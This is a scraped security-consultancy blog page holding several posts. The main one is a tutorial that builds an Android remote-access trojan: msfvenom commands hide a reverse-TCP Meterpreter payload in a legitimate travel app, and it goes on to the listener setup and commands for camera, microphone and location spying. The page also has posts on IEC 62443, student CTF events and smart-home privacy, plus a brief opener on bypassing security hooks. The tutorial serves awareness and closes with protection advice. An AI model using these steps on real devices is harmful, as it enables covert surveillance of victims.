
Backdooring Android Apps for Dummies

31 August 2020 at 07:57

TL;DR – In this post, we’ll explore some mobile malware: how to create it, what it can do, and how to avoid it. Are you interested in learning more about how to protect your phone from shady figures? Then this blog post is for you.


We all know the classic ideas about security on the desktop: install an antivirus, don’t click suspicious links, don’t go to shady websites. Those that take it even further might place a sticker over the webcam of their laptop, because that is the responsible thing to do, right?

But why do most people not apply this logic when it comes to their smartphones? If you think about it, a mobile phone is the ideal target for hackers to gain access to. After all, they often come with not one, but two cameras, a microphone, a GPS antenna, speakers, and they contain a boatload of useful information about us, our friends and the messages we send them. Oh, and of course we take our phone with us, everywhere we go.

In other words, gaining remote access to someone’s mobile device enables an attacker to do all kinds of unsavoury things. In this blog post I’ll explore just how easy it can be to generate a rudimentary Android remote administration trojan (or RAT, for short).

  • Do you simply want to know how to avoid these types of attacks? Then I suggest you skip ahead to the section “How to protect yourself” further down the blog post.
  • Do you want to learn the ins and outs of mobile malware making? Then the following section will guide you through the basics, step by step.

It’s important to know that this Metasploit RAT is a very well-known malware strain that is immediately detected by practically any AV solution. This tutorial speaks of a rudimentary RAT because it lacks much of the functionality you would find in actual malware in the wild, such as obfuscation to remain undetected, or persistence to retain access to the device even when the app is closed. Because we are simply researching the possibilities of these types of malware and are not looking to attack a real target, this method will do just fine for this tutorial.

Cooking yourself some mobile malware: a recipe

For this recipe, you’ll need the following ingredients:
  • A recent Kali VM with the latest Metasploit Framework installed
  • A spare Android device
  • [Optional] A copy of a legitimate Android app (.apk)


Step 1 – Find out your IP address

To generate the payload, we will need to find out some more information about our own system. The first piece of information we’ll get is our system’s IP address. For the purpose of this blog post we’ll use our local IP address but in the real world you’d likely use your external IP address in order to allow infected devices to connect back to you.

Our IP address can simply be found by opening a terminal window, and typing the following command:

ip a

The address I will use is the one from the eth0 network adapter, more specifically the local IPv4 address as circled in the screenshot.
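If you want to grab just the address without scanning through the full `ip a` output, a one-liner like the following can help. This is a sketch that assumes the adapter is named eth0, as on a default Kali VM; adjust the interface name if yours differs:

```shell
# print only the IPv4 address of eth0 (adapter name may differ on your system)
ip -4 -o addr show eth0 | awk '{print $4}' | cut -d/ -f1
```

The `-o` flag puts each address on a single line, so `awk` can pick out the fourth field (address/prefix) and `cut` strips the prefix length.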

Step 2 – Generate the payload

This is where the real work happens: we’ll generate our payload using msfvenom, a payload generator included in the Metasploit Framework.

Before you start, make sure you have the following ready:

  1. Your IP address as found in the previous step
  2. Any unused port to run the exploit handler on
  3. (Optional) A legitimate app to hide the backdoor in

We have two options: either we generate the payload standalone, or we hide it as part of an existing legitimate app. While the former is easier, we will go a step further and use an old version of a well-known travel application to disguise our malware.

To do this, open a new terminal window and navigate to the folder containing the legitimate copy of the app you want to backdoor, then run the following command:

msfvenom -p android/meterpreter/reverse_tcp LHOST=<your_ip_address> LPORT=<your unused port> -x <legitimate app> -k -o <output name>
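The flags in this command are worth a quick breakdown (based on standard msfvenom usage; the angle-bracket placeholders stay exactly as in the command above and must be replaced with your own values):

```shell
# -p          : the payload to embed (a reverse TCP Meterpreter shell for Android)
# LHOST/LPORT : the IP address and port the payload will connect back to
# -x          : the template APK to inject the payload into
# -k          : keep the template app's normal behaviour so it still works as expected
# -o          : the name of the backdoored APK to write out
msfvenom -p android/meterpreter/reverse_tcp LHOST=<your_ip_address> LPORT=<your unused port> \
  -x <legitimate app> -k -o <output name>
```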

For this blog post, I used the following values:

  • <your ip address> =
  • <your unused port> = 4444
  • <legitimate app> = tripadvisor.apk
  • <output name> = ta-rat.apk

Step 3 – Test the malware

Having our payload is all fine and dandy, but in order to send commands to it, we need to start a listener on our Kali VM on the same port we used to create our malware. To do this, launch msfconsole and run the following commands:

use multi/handler
set payload android/meterpreter/reverse_tcp
set lhost <your ip address>
set lport <your unused port>
exploit
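If you find yourself restarting the listener often, this handler setup can also be saved as a Metasploit resource script and replayed in one step. A sketch, where the IP and port are placeholder values standing in for your own from step 2:

```shell
# write the handler setup to a resource script (placeholder LHOST/LPORT values)
cat > handler.rc <<'EOF'
use multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.10
set lport 4444
exploit
EOF
```

You can then start the listener in one go with `msfconsole -r handler.rc`.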


Now that we have our listener set up and ready to accept connections, all that remains for us to do is run the malware on our spare Android phone.

For the purposes of this blog post, I simply transferred the .apk file to the device’s internal storage and ran it. As you can see in the screenshot, the backdoored application requires quite a lot more permissions than the original does.

The original app permissions (left) and the malicious app permissions (right)

All that’s left now is to run the malicious app, and …

We’re in!

Step 4: Playing around with the meterpreter session

Congratulations! If you successfully reached this step, it means you have a working meterpreter session opened on your terminal window and you have pwned the Android phone. So, let’s take a look at what we can do now, shall we?

Activating the cameras

We can get a glimpse into who our victim is by activating either the front or the rear camera of the device. To do this, type the following command in your meterpreter shell:

webcam_stream -i <index>

Where <index> is the index of the camera you want to use; the webcam_list command shows which cameras are available. In my experience, the rear camera was at index 1, while the selfie camera was at index 2.

Recording the microphone

Curious about what’s being said in the victim’s vicinity? Try recording the microphone by typing:

record_mic -d <duration>

Where <duration> is the duration you want to record in seconds. For example, to record 15 seconds of audio with the device’s built-in microphone, run:

record_mic -d 15


Locating the device

We can also find out our victim’s exact location by typing:

geolocate

This command will give us the GPS coordinates of the device, which we can simply look up in Google Maps.
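As an illustration, the reported coordinates can be turned into a clickable Google Maps link with a quick shell snippet (the latitude and longitude below are made-up placeholder values):

```shell
# build a Google Maps search URL from GPS coordinates (placeholder values)
lat="50.8503"
lon="4.3517"
echo "https://www.google.com/maps?q=${lat},${lon}"
```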

Playing an audio file

To finish up, we can play any .wav audio file we have on our system, by typing:

play <filename>.wav

For example:

play astley.wav

Experimenting with other functionality

Of course, these are just a small subset of the commands the meterpreter session has to offer. For a full list of functionality, simply type:

help
Or for more information on a specific command, type:

<command> -h

And play around a bit to see what you can do!


During my initial attempts to get this to work, there were a few difficulties that you might also run into. The most difficult part of the process is finding an app to add the backdoor to. Most recent Android apps prevent you from easily decompiling and repackaging them by employing various obfuscation techniques that make it much more difficult to insert malicious code. For this exercise, I went with an old version of a well-known travel app that did not (yet) implement these techniques, as trying to backdoor any of the more recent versions proved unsuccessful.

This is compounded by the fact that Android’s permissions API is constantly evolving to prevent this type of abuse by malicious apps. As a result, it’s not possible to get this exploit to work on the newest Android versions, which require explicit user approval before granting an app any dangerous permissions at runtime. That said, if you are an Android phone user reading this post, be aware that new malware variants constantly see the light of day, and you should always think twice before granting an application any permission it does not strictly require. Yes, even if you have the latest security updates on your device. Even though the methods described in this blog post only work on less recent versions of Android, these versions represent the majority of the Android market share, so an enormous number of devices remain vulnerable to this exploit to this day.

There are some third-party tools and scripts on the internet that promise more reliable results in backdooring even more recent Android apps. However, in my personal experience these tools did not always live up to expectations. Your mileage may vary, but in any case, don’t blindly trust the ReadMe of code you find on the internet: check it yourself and make sure you understand what it does before you run it.

How to protect yourself

Simply put, protecting yourself against these types of attacks starts with realising how these threats make their way onto your system. Your phone already takes a lot of security precautions against malicious applications, so it’s a good start to always make sure your phone is running the latest update. Additionally, you will need to think twice: once when you choose to install the application, and one more time when you choose to grant the application certain permissions.

First, only install apps from the official app store. Seriously. The app stores for both Android and iOS are strictly curated and scanned for viruses. Is it impossible for a malicious app to sneak by their controls? Not entirely, but it is highly unlikely that it will stay in the store for long before it’s noticed and removed. On iOS, you don’t have much of a choice anyway: if you have not jailbroken your device, you are already restricted to the App Store. On Android, there’s a setting that allows you to install apps from untrusted sources. If you simply want to enjoy the classic experience your smartphone offers, you won’t need to touch that setting at all: the Google Play Store likely has everything you’d ever want. If you are a more advanced user who wants to fully customise their phone, or even root it or add custom ROMs: be my guest, but be extra careful when installing anything on your phone, as you lose many of the protections the Google Play Store offers. Experimenting with your phone is fine, but you need to be very aware of the additional risks you are taking. That goes double if you are downloading unofficial apps from third-party sources.

Second, not all apps need all the permissions they ask for. A flashlight application does not need access to your microphone to function properly, so why would you grant it that permission? If you are installing an application and the permission list seems suspiciously long, or certain items are definitely not needed for the app to function, reconsider installing it in the first place, and definitely do NOT grant it those permissions. In the best case, the developers are invading your privacy by tracking you for advertising. In the worst case, a criminal might be trying to exploit those permissions to spy on you.

One last tip I’d like to give is to leave the security settings on your device enabled. It doesn’t matter if you have an iPhone or an Android phone: both iOS and Android have some great security options built in. This also means you won’t need third-party antivirus apps on your phone. These apps often provide little extra functionality, as they are much more restricted in what they can do compared to the native security features your mobile OS already provides.


If there is anything I’d like you to remember from reading this blog post, it’s the following two points:

1. Creating Mobile Malware is Easy. Almost too easy.

This blog post went over the steps required to make a rudimentary Android malware, demonstrating how easy it can be to compromise a smartphone. With a limited set of tools, we can generate a meterpreter reverse shell payload, hide it in an existing app, repackage it and install it on an Android device. Anyone with enough motivation can learn to do this in a limited time frame; no great amount of technical knowledge is required.

2. Smartphones are computers, they need to be protected.

It might not look like one, but a smartphone is a computer just like the one sitting on your desk. These devices are equally vulnerable to malware, and even though the creators of these devices already take a lot of precautions, the user is ultimately responsible for keeping their device safe. Smartphone users should be aware of the risks their devices face: stay away from unofficial applications outside of the app store, enable the security settings on your device, and be careful not to grant excessive permissions to apps, especially from untrusted sources.

About the Author

Jonah is a consultant in the Cyber Strategy & Culture team at NVISO. He taps into the knowledge of his technical background to help organisations build out their cyber security strategy. He has a strong interest in ICT law and privacy regulation, as well as the ethical aspects of IT. In his personal life, he enjoys video & board games, is a licensed ham radio operator, likes fidgeting around with small DIY projects, and secretly dreams about one day getting his private pilot’s license (PPL).

Find out more about Jonah on his personal website or on LinkedIn.

Securing IACS based on ISA/IEC 62443 – Part 1: The Big Picture

4 January 2021 at 16:08

For many years, industrial automation and control systems (IACS) relied on the fact that they were usually isolated in physically secured areas, running on proprietary hardware and software. When open technologies, standard operating systems and protocols started pushing their way into IACS, replacing proprietary solutions, the former “security through obscurity” approach no longer worked. Connecting operational technology (OT) networks to information technology (IT) networks had the benefit of making central monitoring and improvement of industrial processes easier – but all these changes also brought new threats, and the question arose of how to properly secure control systems.

This is where ISA/IEC 62443 comes into the picture. The attempt to provide guidance on how to secure IACS against cyber threats dates back to 2002, when the International Society for Automation (ISA) started creating a series of standards referred to as ISA-99. In 2010, ISA joined forces with the International Electrotechnical Commission (IEC), which led to the release of the combined standard ISA/IEC 62443 that integrates the former ISA-99 documents.

ISO 27001 vs IEC 62443 – same but different?

But why is there the need for a separate standard at all? Does it not suffice to simply apply security measures that have already been established for IT systems, for example by implementing the requirements of ISO 27001? As a company responsible for designing, implementing, or managing IACS, you might face exactly this question, especially if you want to achieve an official certification.

Despite some similarities, OT systems and IT systems do have fundamental differences. One of the most significant differences is probably that failures in industrial processes usually impact the physical world, i.e. they could harm human health and welfare, endanger the environment by spilling hazardous materials or impact the local economy, for example in case of massive power outages. Also, the focus on core security objectives – such as confidentiality, integrity and availability – is different: While IT prioritizes confidentiality of data, OT focuses on availability of systems; the security objectives of both areas are thus diametrically opposed.

IEC 62443 outlines the unique requirements of IACS while also building on top of already established practices. This means that parts of IEC 62443 were developed with reference to ISO 27001 but also address the differences between IACS and IT systems. Furthermore, the standard not only outlines the implementation of a management system but also defines detailed functional and process requirements for both individual IACS components and entire control systems. IEC 62443 thus has a far broader scope than ISO 27001 and is more tailored to the specifics of IACS.

IEC 62443 at a glance

The IEC 62443 standard is targeted at three main roles:

  • Product suppliers that develop, distribute and maintain components or systems used in automated solutions.
  • System integrators that design, deploy and commission the automated solution.
  • Asset owners that operate, maintain and decommission the automated solution.

These roles could reside in the same organization or be fulfilled by different organizations. Asset owners might, for example, have their own department responsible for system integration. In another scenario, the asset owner might delegate the task of maintaining an automation solution to an external service provider.

The structure of the standard reflects this role definition by grouping related documents accordingly. As a result, IEC 62443 comprises four chapters, each with multiple documents. Some of the documents are currently still in development and have not been released yet. The current status can be tracked at: https://www.isa.org/isa99/

Structure of IEC 62443

The first chapter, General, provides an overview of main concepts and models applied within the standard. At the time of this post, most documents of this chapter are still under development.

The second chapter, Policies and Procedures, covers requirements and measures for establishing a Cyber Security Management System. In the first two parts you will see many references to ISO 27001 and even a mapping of the requirements in both standards. The other parts focus on the processes involved in operating and maintaining IACS and are thus mainly directed at asset owners or – if these tasks are outsourced – at service providers.

The third chapter, System, is mainly directed at system integrators. It provides an overview and assessment of different security measures ranging from authentication techniques and encryption to physical security controls. Furthermore, it guides through the risk assessment process for IACS environments and outlines specific technical requirements for control systems.

The last chapter, Component, focuses on requirements for product suppliers. It covers both procedural aspects such as setting up a secure development lifecycle and technical requirements that a component should meet.

One standard for the entire lifecycle

With regard to IACS, we can distinguish between the lifecycle of a single component that is part of a control system and the lifecycle of the control system itself. Both lifecycles overlap at the point where components get integrated into an automation solution and need to be operated and maintained.

Product suppliers are responsible for all phases within their products’ lifecycle. Part 4-1 provides guidance on how to set up development processes that integrate security-related activities right from the start of product development. Part 4-2 focuses on the product itself and defines specific requirements a product must meet in order to achieve a certain degree of security. Another relevant part especially in the maintenance phase is part 2-3 that outlines a structured process for managing patches.

Applicability of IEC 62443 parts within the product and IACS lifecycle

In the first phase of the IACS lifecycle, the main objective is creating the functional specification. Part 2-1 provides the asset owner with a framework for setting up organizational structures and processes that will ensure that all security dimensions are considered when creating the specification and defining security targets for the IACS.

The commissioning of an IACS usually lies within the responsibility of the system integrator. Based on the previously defined security targets, the system integrator must develop a protection concept in cooperation with the asset owner. Part 3-2 outlines requirements for conducting a risk assessment in order to establish a proper segmentation of the system architecture. Part 3-3 defines which requirements a system must meet in order to achieve a certain level of security. By implementing these requirements, system integrators can prove that their solution meets the security targets defined by the asset owner.

The main responsibility for operating and maintaining the automation solution lies with the asset owner. Part 2-1 provides guidelines on how to implement a security management system in order to continuously maintain and improve security. More specific requirements, for example on how to manage accounts or remote access to systems, are outlined in part 2-4; this part should also be considered by system integrators and any service provider supporting the asset owner in the operating phase.

Finally, both parts 2-1 and 2-4 also define requirements for decommissioning single components or the complete automation solution.

Defence in depth

IEC 62443 builds upon the defence in depth principle involving all stakeholders. Defence in depth means that multiple layers of security controls are applied: In case one security control fails, another control ensures that this will still not cause any greater harm.

With regard to IACS, this means that the first layer of defence are measures implemented by the asset owner. This can be for example security policies and procedures or physical controls protecting the perimeter. Further layers of defence are then created in the design of the automation solution by the system integrator, for example by enforcing network segmentation and deploying firewalls. The inner defence layer is realized by the functional security capabilities of components and systems in use. They are developed by the product supplier who is responsible for integrating proper security functions.

Security levels

The number of requirements and security functions to implement depends on the level of security that has been specified by the asset owner. IEC 62443 defines four Security Levels (SL) with increasing protection requirements.

IEC 62443 security levels

The standard further defines three different types of security levels:

  • Target Security Level (SL-T) is the desired level of security that is usually determined by performing a risk assessment.
  • Achieved Security Level (SL-A) is the degree of security achieved with the currently implemented measures. It can be determined through an audit, for example, after the design is available or when the system is in place in order to verify that the implementation meets the previously defined requirements.
  • Capability Security Level (SL-C) is the highest possible security level that a component or system can provide without implementing additional measures.

A simple example illustrates how these three types of security levels play together: we want to protect our orchard against kids stealing apples. This objective is our target security level (SL-T), corresponding to Security Level 2. There are different means available that could help us achieve our goal, such as putting up a sign, building a fence, or buying a watchdog. A sign might not be very effective, i.e. it does not really provide any protection, so its capability security level is 0. A fence or a watchdog can provide better protection, meaning they have higher capability security levels. We now decide which means of protection to set up and then measure how well we are protected, i.e. which security level we have achieved with these measures (SL-A).

Translating this example to the IACS lifecycle, this means that the different types of security levels are applied at different phases of the system lifecycle:

  • The asset owner will first specify the target security level required for a particular automation solution.
  • The system integrator will design the solution to meet those targets. In an iterative process, the currently achieved security level (SL-A) is measured and compared to the target security level (SL-T) – also after the solution is put into operation, to ensure that the achieved security level does not decrease over time.
  • As part of the design process the system integrator will select systems and components with the necessary capability security level (SL-C).

Getting certified

After having gained a basic understanding of what IEC 62443 comprises, let us come back to the initial question of how you can achieve an official certification. One misconception is that there is just one IEC 62443 certification, as is the case for ISO 27001. Given the broad range of the standard and the multiple stakeholders addressed, the question you should pose is not “Should I get an IEC 62443 certification?” but rather “Which IEC 62443 certification should I get?”

As outlined before, from the stakeholders’ perspective, some parts of the standard are more relevant than others. As a result, there are different IEC 62443 certifications focusing on different parts of the standard. For example, most certification programs for product suppliers only consider the requirements outlined in parts 4-1 and 4-2, while certifications for system integrators focus on parts 2-4 and 3-3.

As the market for IEC 62443 certification programs is still less mature when compared with ISO 27001 certifications, the number of organizations offering such a certification is also smaller; some of the most prominent players are TÜV, exida, CertX, UL, DEKRA and ISASecure.


IEC 62443 might be confusing at first glance, and the sheer number of documents and requirements may seem intimidating. However, most likely only a small part of the standard will actually be applicable to your organization. The upcoming parts of this blog series on IEC 62443 will outline the specific requirements for each stakeholder in more detail. By the end, you will hopefully have a better understanding of how the standard helps you improve the security of your components or systems and which steps you need to take to get closer to an IEC 62443 certification.

If you need further guidance and support in preparing for an IEC 62443 certification, please contact [email protected].

About the author

Claudia Ully is a penetration tester working in the NVISO Software and Security Assessments team.
Apart from spotting vulnerabilities in applications, she enjoys helping and training developers and IT staff to better understand and prevent security issues.
You can find Claudia on LinkedIn.

Cyber Security Contests – A look behind the scenes about how to expand the community

10 December 2020 at 16:12

Cyber security has long since become a strategic priority for organizations across the globe and in all sectors. Therefore, training and hiring young talent in information security has become a crucial goal.

To raise awareness of cyber security threats and help train a generation of security-aware experts, we at NVISO organize Capture the Flag (CTF) cyber security events in two countries, Belgium and Germany, reaching a broad audience.

Each year, we organize the Cyber Security Challenge Belgium and the Cyber Security Rumble Germany. After six successful editions in Belgium and two in Germany, we want to share a little information on how the events came to be, and what the main challenges are that we face.


The organization team of this year’s Challenge

The Capture the Flag events at a glance

Capture the Flag is best known as a game you used to play as a kid: the field is divided into two camps, and the goal of your team is to steal the opponent’s flag and bring it to your own camp. Although that version of CTF is a lot of fun, the context in cyber security is slightly different. In a security CTF, flags can be stored on a vulnerable webserver, compiled into malicious executables, or encrypted using flawed cryptography. Teams then need to solve the various challenges using a broad range of skills to get the flag and score the points.

CTFs have been very popular in the information security field for a long time – the DefCon CTF has been organized since 1996! – and are a great way to learn new skillsets, hang out with friends and colleagues and generally have a great time. The rush of finally getting that flag after hours (or days) of work really gets the adrenaline flowing. 😉

CTFs are also plentiful: if you want, you can play one almost every week(end), and often multiple CTFs are running at the same time! For an overview of all CTFs, take a look at ctftime.org.

Why do we organize ‘yet another CTF’? 

With a CTF being organized every week, why would we want to add yet another one? Well, the goal of our CTFs is quite different from that of a typical CTF. Most CTFs act as a competition for experienced security professionals, where incredibly skilled hackers show off their skills and take home the prizes. When we started organizing the first CTF in Belgium in 2015, there was just one goal: get more students into the information security community.

It’s no secret that the industry is desperately searching for more motivated people to join us, and positions often stay vacant for a long time. Universities and colleges often offer security courses, but the number of students that actually end up joining the information security sector is rather low.

With our CTF, we want to show students that: 

  • Hacking is fun (Who doesn’t like breaking stuff?) 
  • General computer skills and the right attitude can take you very far 
  • Even though it looks like a niche market, the cyber security field is very broad with many different aspects 

As our target audience, we chose all graduating students from local colleges and universities, as they will most likely be choosing a career after graduating and it would be nice if we can push them in our direction 😎

But this ain’t no ordinary CTF 

To reach our goal, we created the Challenge in Belgium. We chose a jeopardy-style CTF (as opposed to an attack/defense style) to keep the entry level low and give us the possibility to introduce a wide range of challenges to students.

A participant at the Rumble 2019 live event

While the core of both the Challenge and the Rumble is a CTF, there’s a little more to it, to accommodate two sub-goals: involving the wider infosec community in creating challenges, and testing contestants’ social skills.

The first one is probably the easiest. Each year, we contact everyone we know in the Belgian/German infosec field and ask if they want to create a challenge. By outsourcing challenge creation, we can both shine a spotlight on talented individuals and make sure that there is a very wide range of challenges to solve.

Testing social skills is quite difficult in a CTF, as contestants typically sit behind their laptop screens for the entirety of the competition and don’t really have to interact with other contestants or the organizers. To add this aspect to our event, we came up with the concept of challenges created by our sponsors. For these challenges, the qualifying teams have to face a panel of experts and solve problems interactively. We’ve had live forensics investigations, incident response role-playing, debates on the pros/cons of a cashless society, and calling up people to social engineer them into handing over valuable information.

These challenges also automatically allow students and future employers to interact, which is a double win. 

Expanding to Germany 

After six years, the Cyber Security Challenge in Belgium reaches over 700 students from more than 30 schools, and the Challenge is even used as a preselection for the Belgian team for the European Cyber Security Challenge, organized by ENISA. Due to this success and the interest of the industry, NVISO launched a sister event in Germany in 2019, called the Cyber Security Rumble. With a focus mainly on German academic students, the event was set up in cooperation with RedRocket (a well-known German CTF team), the University of Bonn-Rhein-Sieg, SANS, and the German Federal Office for Information Security. The collaboration between these parties already shows that the goal remains to have the CTF driven by the community, and not by a single company.

Even though the Challenge in Belgium had been organized successfully for quite a few years, it was still a gamble to see if Germany was as receptive to the students-only concept. Luckily, the first year managed to reach 300 participants in the qualifier rounds, from which 13 teams made it into the finals.  

The Challenge and Rumble in 2020 

The organization of the latest edition of the Cyber Security Challenge & Rumble was, as with all other events in 2020, defined by the COVID pandemic. While we love the interaction we have with the students during each edition, it was clear that we had to move to an online-only event to make sure everyone can stay safe. 

For the Challenge in Belgium, we decided to open the finals CTF to all the students that would have qualified for our computer-less CTF, and once again the top 12 teams would continue on day 2 with interactive challenges, this time in an online format. The online format took a lot more work on the day itself, as we needed to make sure everyone was joining (and leaving 😉) the correct meeting rooms. Discord allowed us to interact directly with students in case there were issues or questions, and also helped to still have a relaxed atmosphere in the general channels. The second day ended with an online prize ceremony, where all top 12 teams received their prizes, such as a trip to DefCon Las Vegas, a SANS course and much more.  

The German Rumble, in turn, was a full two-day online event organized on Halloween and welcomed more than 470 active teams, both German academic teams as well as international ones. By also communicating with the participants via a Discord chat, the players could get in contact with the sponsors that created the challenges and interact with other participants about the challenges. Moreover, a scoreboard showed each team’s progress and ranking, which boosted the pace and team spirit a little more. The Rumble, too, was rounded off with a prize ceremony, in which a representative of SANS announced the prizes.  

Tweet from the Rumble during its online prize ceremony

The challenges we still face each year 

There are various challenges and questions that pop up each year. While we don’t have a solid answer on all of them, we still want to share them, and any input in the comments is of course appreciated! 

Reaching students 

Although both the Challenge and the Rumble have grown in popularity, it’s a very large effort each time to reach all the students. We have to actively communicate with professors, schools and student unions to make sure students participate, often even visiting schools and presenting our challenge in security-focussed courses.  

Keeping the competition fair for everyone 

With such awesome prizes on the line, there’s always the possibility of teams collaborating or sharing solutions and flags. This is hard to prevent entirely, although we do have various technical checks in place to detect weird behaviour. Additionally, we rely on the schools to do the right thing: some schools even organize a small on-campus event during the qualifiers so that teams can be in the same room, and through our good connections with the relevant professors we can be reasonably confident that students are behaving honestly. 

A participant in this year’s online Challenge 

Keeping it students only 

Another issue that regularly pops up is how we define a student. For example: Can PhD students participate? Technically they are students, with a valid student card. In practice, they would have a huge advantage over other students. Similarly, what if someone who has been in the industry for many years decides to join an online course at a registered university/college? Can they join? The hardest part here is being consistent while also being fair to everyone involved… 

NVISO as the common organizer

With our efforts to organize these great initiatives and thus to enhance the Cyber Security Communities in both countries, we are constantly supporting cross border activities. Both can learn from each other, are in constant communication and help to drive individual events to their success. We’re happy that both events can reach a substantial number of students and that we create interactivity between Belgium and Germany.  

Come join us! 

If you’re a cyber security specialist in Belgium or Germany, we’d love your help in creating challenges. It’s a great way to show your skills and connect with other challenge creators, sponsors and of course the awesome organizing team.  

And of course, if you’re still a Belgian/German student, don’t hesitate and sign up for either the Challenge or Rumble and take home some of the awesome prizes. 😊 

If you are not convinced yet, check out our after movies and catch a glimpse of the atmosphere of the past years: 

After movie Cyber Security Challenge Belgium

After movie Cyber Security Rumble Germany

Stay tuned for the events in 2021 and for exciting and fun challenges to crack!   

About the authors

This article was jointly written by:

  • Annika ten Velden, Operations Manager
  • Marina Hirschberger, Senior Consultant
  • Jeroen Beckers, Mobile security expert

They are all working at NVISO and are actively contributing to the organization of the events. While Annika and Jeroen are taking care of the Challenge in Belgium, Marina is part of the organization team of the Rumble in Germany. 

Smart Home Devices: assets or liabilities? – Part 2: Privacy

30 November 2020 at 09:52

TL;DR – Part two of this trilogy of blog posts will tackle the next big topic when it comes to smart home devices: privacy. Are these devices doubling as the ultimate data collection tool, and are we unwittingly providing the manufacturers with all of our private data? Find out in this blog post!

This blog post is part of a series – you can read part 1 here, and keep an eye out for the next part too!

Security: ✓ – Privacy: ?

In my previous blog post, I gave some insights into the security level provided by a few Smart Home environments that are currently sold on the European market. In conclusion, I found that the security of these devices is often hit or miss, and the lack of transparency around security means it can be quite difficult for consumers to tell the good devices from the bad apples. There is one major topic missing from that post, though: even if a device is secure, how well does it protect the user’s privacy?

Privacy concerns

It turns out that this question is not unjustified: just like the security concerns surrounding smart home devices, privacy concerns are at least equally present, maybe even more so. The fear that our own house is spying on us is something that should be countered by transparency and strong data subject rights.

These data subject access rights might have already been there on paper for a long time, but it’s never been easy to enforce them in practice. I strongly recommend looking at this paper by Jef Ausloos and Pierre Dewitte that shows just how difficult it used to be to get a data controller to comply with existing regulation.

Does this mean that there is no hope? Well, not exactly. Since then, the GDPR has come into effect. Even though it might still be too early to see concrete results, there have been some developments moving in the right direction. Just a few months ago, in July 2020, the EU-US Privacy Shield was deemed invalid after a ruling by the Court of Justice of the EU in a case brought up by Max Schrems’ NGO ‘noyb’ (‘none of your business’). This decision means that data transfers from the EU to the US are subject to the same requirements as transfers to any other country outside of the EU.

Existing regulation in Europe

So, which laws are there that protect our privacy anyway? To start with the basics, the European Convention on Human Rights and the Charter of Fundamental Rights of the European Union lay the groundwork for every individual’s right to privacy in their Article 8 and Article 7 respectively. These articles state that: “Everyone has the right to respect for his private and family life, his home and his correspondence.”

On top of these, there used to be Directive 95/46/EC, which outlined the requirements each EU member state had to implement into its national privacy regulation. However, each member state could implement these requirements at its own discretion, which led to a lot of diverging laws between EU member states. The directive was eventually repealed when the GDPR took its place.

The General Data Protection Regulation (GDPR) is the current regulation that harmonises the privacy regulation for all EU member states. Its well-known new provisions enable data subjects to more effectively enforce their rights and protects the privacy of all people within the EU; or at least it does so on paper.

From paper to practice

Aside from testing the security of each device, I decided to also include some privacy tests in the scope of my assessments. For more information on the choice of devices, make sure to check out my previous blog post!

For each device, I added privacy-related tests in two major fields:

  • privacy policies: I verified if, for each device, the privacy policy contained all the relevant information it should have according to GDPR;
  • data subject access rights: I contacted each vendor’s privacy department with a generic data subject access request, asking them to give me a copy of the personal data they held about me.

Privacy policies: all or nothing

The first step in checking the completeness of a privacy policy is finding out where it is published – if it even exists. In many cases, finding a privacy policy was easy, but finding the right one was a different story. Many vendors had multiple versions of the policy, sometimes different editions for the USA and the EU, and other times they simply excluded everything from their scope except the website – not very useful for this research.

The privacy policies showed the exact same phenomenon as I already saw in the security part of the research: if they were compliant on one part, usually they put in a good attempt to be compliant across the board. The opposite was also true: if a policy was incomplete, it often didn’t contain any of the required info as per the GDPR. The specific elements that need to be included in a privacy policy under GDPR are outlined in Article 13. The table below shows which of the policies adhered to which provisions in this article.

The results of checking each privacy policy
(Image credit: see “Reference” below)

Access requests: hide & seek

In the exact same way that it can be difficult to locate a privacy policy, it can sometimes be a real hassle to find the correct contact details to submit a data access request. Most vendors with a compliant privacy policy had either an email address of the DPO, or a link to an online form listed as a means of contact. In case I could not locate the correct contact details, I would attempt to reach them a single time by mailing to their general information address or contacting their customer support. I would also send out a single reminder to each vendor if they had not replied after one month.

What it feels like trying to reach the DPO of many manufacturers
(Image credit: imgflip.com)

Surprisingly, many vendors straight up ignored the request: one third (!) of requests went unanswered. Those that did reply usually responded quite quickly after receiving the initial request, with a few exceptions that requested deadline extensions or simply claimed to “have never received the initial email” after being sent a reminder.

One third of the sent requests went unanswered
(Image credit: see “Reference” below)

Most importantly, the number of satisfactory replies after running this experiment for over 5 months was disappointingly low. Often, either the answers to the questions in the request or the returned data itself were strongly lacking. In some cases, no satisfying answer was given at all. In one or two notable instances, however, the follow up of the privacy department was excellent and an active effort was made to comply with the request as well as possible.

The aftermath

From these results, it’s clear that there are some changes to be seen in the privacy landscape. Here and there, companies are putting in an effort to be GDPR compliant, with varying effectiveness. However, just like with security, there is a major gap in maturity between the different vendors: the divide between those that attempt to be compliant and those that are non-compliant is massive. Most notably, the companies that ignored access requests or had outdated privacy policies were those that might deem themselves too small to be “noticed” by authorities or are simply located too far from the EU to care about it. This suggests there is a need for more active enforcement, also on companies incorporated outside of the EU, and more transparency surrounding fines and penalties imposed on those that are non-compliant.

Even though privacy compliance is going in the right direction, there is still a lot of progress to be made in order to get an acceptable baseline of compliance across the industry. Active enforcement and increased transparency surrounding fines and penalties is needed to motivate organisations to invest in their privacy and data protection maturity.

Stay tuned for Part 3 of this series, in which I’ll be discussing some options for dealing with the issues I found during this research.

This research was conducted as part of the author’s thesis dissertation submitted to gain his Master of Science: Computer Science Engineering at KU Leuven and device purchases were funded by NVISO labs. The full paper is available on KU Leuven libraries.


Reference

[1] Bellemans, Jonah. June 2020. The state of the market: A comparative study of IoT device security implementations. KU Leuven, Faculteit Ingenieurswetenschappen.

About the Author

Jonah is a consultant in the Cyber Strategy & Culture team at NVISO. He taps into the knowledge of his technical background to help organisations build out their Cyber Security Strategy. He has a strong interest in ICT law and privacy regulation, as well as the ethical aspects of IT. In his personal life, he enjoys video & board games, is a licensed ham radio operator, likes fidgeting around with small DIY projects, and secretly dreams about one day getting his private pilot’s license (PPL).

Find out more about Jonah on his personal website or on Linkedin.

Dynamic Invocation in .NET to bypass hooks

20 November 2020 at 08:45

TLDR: This blogpost showcases several methods of dynamic invocation that can be leveraged to bypass inline and IAT hooks. A proof of concept can be found here: https://github.com/NVISO-BE/DInvisibleRegistry

A while ago, a noticeable shift in red team tradecraft happened. More and more tooling is getting created in C# or ported from PowerShell to C#.
PowerShell became better shielded against offensive tradecraft thanks to a variety of changes, ranging from AMSI (Anti Malware Scan Interface) to Script Block logging and more.
One of the cool features of C# is the ability to call the Win32 API and manipulate low-level functions like you normally would in C or C++.
